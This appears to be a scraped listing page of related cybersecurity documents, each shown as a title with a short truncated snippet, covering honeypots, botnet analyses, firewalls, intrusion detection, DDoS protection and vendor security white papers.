More informationComputer Security CS 426 Lecture 36. CS426 Fall 2010/Lecture 36 1
Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls CS426 Fall 2010/Lecture 36 1 Announcements There will be a quiz on Wed There will be a guest lecture on Friday, by Prof. Chris Clifton
More informationLAN Based Intrusion Detection And Alerts
LAN Based Intrusion Detection And Alerts Vivek Malik, Mohit Jhawar, Harleen, Akshay Khanijau, Nakul Chawla Abstract : With the ever increasing size and number of networks around the world, the network
More informationStorm Worm & Botnet Analysis
Storm Worm & Botnet Analysis Jun Zhang Security Researcher, Websense Security Labs June 2008 Introduction This month, we caught a new Worm/Trojan sample on ours labs. This worm uses email and various phishing
More informationCharacterizing the IRC-based Botnet Phenomenon
Reihe Informatik. TR-2007-010 Characterizing the IRC-based Botnet Phenomenon Jianwei Zhuge 1, Thorsten Holz 2, Xinhui Han 1, Jinpeng Guo 1, and Wei Zou 1 1 Peking University 2 University of Mannheim Institute
More informationShellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
More informationGetting Ahead of Malware
IT@Intel White Paper Intel Information Technology Security December 2009 Getting Ahead of Malware Executive Overview Since implementing our security event monitor and detection processes two years ago,
More informationA Hybrid Honeypot Architecture for Scalable Network Monitoring
A Hybrid Honeypot Architecture for Scalable Network Monitoring Michael Bailey, Evan Cooke, David Watson, Farnam Jahanian University of Michigan {mibailey, emcooke, dwatson, farnam}@eecs.umich.edu Niels
More informationA Generic Toolkit for Converting Web Applications Into High-Interaction Honeypots
A Generic Toolkit for Converting Web Applications Into High-Interaction Honeypots Michael Müter 1, Felix Freiling 1, Thorsten Holz 1, and Jeanna Matthews 2 1 Laboratory for Dependable Distributed Systems
More informationAttacks from the Inside
Attacks from the Inside Eddy Willems, G Data Righard J. Zwienenberg, Norman Attacks from the Inside. Agenda - Social Networking / Engineering - Where are the threats coming from - Infection vectors - The
More informationAutomating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com
Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com A number of devices are running Linux due to its flexibility and open source nature. This has made Linux platform
More informationBuyers Guide to Web Protection
Buyers Guide to Web Protection The web is the number one source for malware distribution today. While many organizations have replaced first-generation URL filters with secure web gateways, even these
More informationHoneypots & Honeynets Overview. Adli Wahid Security Specialist, APNIC.net adli@apnic.net
Honeypots & Honeynets Overview Adli Wahid Security Specialist, APNIC.net adli@apnic.net 1 Contents 1. ObjecCves 2. DefiniCon of Honeypot & Honeynets 3. Benefits & Risk consideracon 4. Example of Honeypot
More informationBotnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks Felix C. Freiling, Thorsten Holz, and Georg Wicherski Laboratory for Dependable Distributed Systems,
More informationDESIGN OF NETWORK SECURITY PROJECTS USING HONEYPOTS *
DESIGN OF NETWORK SECURITY PROJECTS USING HONEYPOTS * Karthik Sadasivam, Banuprasad Samudrala, T. Andrew Yang University of Houston Clear Lake 2700 Bay Area Blvd., Houston, TX 77058 (281) 283-3835, yang@cl.uh.edu
More informationIDS / IPS. James E. Thiel S.W.A.T.
IDS / IPS An introduction to intrusion detection and intrusion prevention systems James E. Thiel January 14, 2005 S.W.A.T. Drexel University Overview Intrusion Detection Purpose Types Detection Methods
More informationWeb Client Attacks. Scribed by Gelareh Taban. April 21, 2008. 1 Web Server Attacks continued
Web Client Attacks Scribed by Gelareh Taban April 21, 2008 1 Web Server Attacks continued We first conclude our discussion of detection of web server attacks from the previous lecture, which focused on
More informationA Pointillist Approach for Comparing Honeypots. Fabien Pouget, Thorsten Holz
A Pointillist Approach for Comparing Honeypots Fabien Pouget, Thorsten Holz Motivations What are the Modus Operandi of the perpetrators? Who has data to validate in a rigorous way any kind of taxonomy
More informationQUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
More informationLASTLINE WHITEPAPER. In-Depth Analysis of Malware
LASTLINE WHITEPAPER In-Depth Analysis of Malware Abstract Malware analysis is the process of determining the purpose and functionality of a given malware sample (such as a virus, worm, or Trojan horse).
More informationAdvanced Honeypot System for Analysing Network Security
ISSN: 2347-3215 Volume 2 Number 4 (April-2014) pp. 65-70 www.ijcrar.com Advanced Honeypot System for Analysing Network Security Suruchi Narote 1* and Sandeep Khanna 2 1 Department of Computer Engineering.
More information2014 ASE BIGDATA/SOCIALCOM/CYBERSECURITY Conference, Stanford University, May 27-31, 2014 ASE 2014 ISBN: 978-1-62561-000-3 1
ASE 2014 ISBN: 978-1-62561-000-3 1 Network Traffic Analysis of ZeroAccess Bot Shree Garg, Anil K. Sarje, Sateesh K. Peddoju Department of Computer Science & Engineering Indian Institute of Technology Roorkee,
More informationCatching hackers using a virtual honeynet: A case study
Catching hackers using a virtual honeynet: A case study D.N. Pasman d.n.pasman@student.utwente.nl ABSTRACT This paper presents an evaluation of honeypots used for gathering information about the methods
More informationCloud Services Prevent Zero-day and Targeted Attacks
Cloud Services Prevent Zero-day and Targeted Attacks WOULD YOU OPEN THIS ATTACHMENT? 2 TARGETED ATTACKS BEGIN WITH ZERO-DAY EXPLOITS Duqu Worm Causing Collateral Damage in a Silent Cyber-War Worm exploiting
More informationHow To Protect Your Firewall From Attack From A Malicious Computer Or Network Device
Ch.9 Firewalls and Intrusion Prevention Systems Firewalls: effective means of protecting LANs Internet connectivity is essential for every organization and individuals introduces threats from the Internet
More informationNetworks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
More informationNEXPOSE ENTERPRISE METASPLOIT PRO. Effective Vulnerability Management and validation. March 2015
NEXPOSE ENTERPRISE METASPLOIT PRO Effective Vulnerability Management and validation March 2015 KEY SECURITY CHALLENGES Common Challenges Organizations Experience Key Security Challenges Visibility gaps
More informationDivide and Conquer Real World Distributed Port Scanning
Divide and Conquer Real World Distributed Port Scanning Ofer Maor CTO Hacktics 16 Feb 2006 Hackers & Threats I, 3:25PM (HT1-302) Introduction Divide and Conquer: Real World Distributed Port Scanning reviews
More informationWHITE PAPER. FortiGate DoS Protection Block Malicious Traffic Before It Affects Critical Applications and Systems
WHITE PAPER FortiGate DoS Protection Block Malicious Traffic Before It Affects Critical Applications and Systems Abstract: Denial of Service (DoS) attacks have been a part of the internet landscape for
More informationProtecting the Infrastructure: Symantec Web Gateway
Protecting the Infrastructure: Symantec Web Gateway 1 Why Symantec for Web Security? Flexibility and Choice Best in class hosted service, appliance, and virtual appliance (upcoming) deployment options
More informationHoneypots / honeynets
Honeypots / honeynets presentatie naam 1 Agenda Honeypots Honeynets Honeywall presentatie naam 2 Traffic Problem: Vast quantities of normal traffic Find suspect bits presentatie naam 3 Honeypot Machine
More informationDan Hubbard VP Security Research
Dan Hubbard VP Security Research Perpetual Beta = Live Testing = Trouble Airline Terminals using Active Script Start : Middle : End Wait, the Web has version numbers? Web Two Dot UH-OH or Exploit 2.0 An
More informationCloud Services Prevent Zero-day and Targeted Attacks Tom De Belie Security Engineer. [Restricted] ONLY for designated groups and individuals
Cloud Services Prevent Zero-day and Targeted Attacks Tom De Belie Security Engineer Facts 2 3 WOULD YOU OPEN THIS ATTACHMENT? 4 TARGETED ATTACKS BEGIN WITH ZERO-DAY EXPLOITS 5 Check Point Multi-Layered
More informationSeminar Computer Security
Seminar Computer Security DoS/DDoS attacks and botnets Hannes Korte Overview Introduction What is a Denial of Service attack? The distributed version The attacker's motivation Basics Bots and botnets Example
More informationReal World and Vulnerability Protection, Performance and Remediation Report
Real World and Vulnerability Protection, Performance and Remediation Report A test commissioned by Symantec Corporation and performed by AV-Test GmbH Date of the report: September 17 th, 2014, last update:
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More informationDetecting P2P-Controlled Bots on the Host
Detecting P2P-Controlled Bots on the Host Antti Nummipuro Helsinki University of Technology anummipu # cc.hut.fi Abstract Storm Worm is a trojan that uses a Peer-to-Peer (P2P) protocol as a command and
More informationNetwork Based Intrusion Detection Using Honey pot Deception
Network Based Intrusion Detection Using Honey pot Deception Dr.K.V.Kulhalli, S.R.Khot Department of Electronics and Communication Engineering D.Y.Patil College of Engg.& technology, Kolhapur,Maharashtra,India.
More informationCost-effective Detection of Drive-by-Download Attacks with Hybrid Client Honeypots
Cost-effective Detection of Drive-by-Download Attacks with Hybrid Client Honeypots by Christian Seifert A thesis submitted to the Victoria University of Wellington in fulfilment of the requirements for
More informationA Survey on Honeypot Based Signature Generation Techniques in Computer Network Security
A Survey on Honeypot Based Signature Generation Techniques in Computer Network Security Geetika yadav 1, Ms.Prabhjot Kaur 2 1 M.Tech Student, Department of CSE, B.S.Anangpuria Institute of Technology and
More informationDetecting Botnet Propagation
Detecting Botnet Propagation How to confirm maliciousness Table of Contents This paper describes techniques that should only be performed by qualified experts in a controlled and isolated environment.
More informationProtecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall
Protecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall A FORTINET WHITE PAPER www.fortinet.com Introduction Denial of Service attacks are rapidly becoming a popular attack vector used
More informationData Collection and Data Analysis in Honeypots and Honeynets
Data Collection and Data Analysis in Honeypots and Honeynets Pavol Sokol, Patrik Pekarčík, Tomáš Bajtoš pavol.sokol@upjs.sk, patrik.pekarcik@upjs.sk, tomas.bajtos@student.upjs.sk Institute of Computer
More informationspying with bots spying with bots
spying with bots T HORSTEN HOLZ spying with bots Thorsten Holz is a research student at the Laboratory for Dependable Distributed Systems at RWTH Aachen University. He is one of the founders of the German
More informationInside the Storm: Protocols and Encryption of the Storm Botnet
Inside the Storm: Protocols and Encryption of the Storm Botnet Joe Stewart, GCIH Director of Malware Research, SecureWorks To be covered in this talk: Quick-and-dirty unpacking of Storm Structure of the
More information[ X OR DDoS T h r e a t A d v i sory] akamai.com
[ X OR DDoS T h r e a t A d v i sory] akamai.com What is the XOR DDoS threat The XOR DDoS botnet has produced DDoS attacks from a few Gbps to 150+ Gbps The gaming sector has been the primary target, followed
More informationBarracuda Intrusion Detection and Prevention System
Providing complete and comprehensive real-time network protection Today s networks are constantly under attack by an ever growing number of emerging exploits and attackers using advanced evasion techniques
More informationAutonomous Hybrid Honeypot as the Future of Distributed Computer Systems Security
Acta Polytechnica Hungarica Vol. 10, No. 6, 2013 Autonomous Hybrid Honeypot as the Future of Distributed Computer Systems Security Peter Fanfara, Marek Dufala, Ján Radušovský Department of Computers and
More informationSteps Towards a DoS-resistant Internet Architecture. Mark Handley Adam Greenhalgh University College London
Steps Towards a DoS-resistant Internet Architecture Mark Handley Adam Greenhalgh University College London Denial-of-Service Attacker attempts to prevent the victim from doing any useful work. Flooding
More information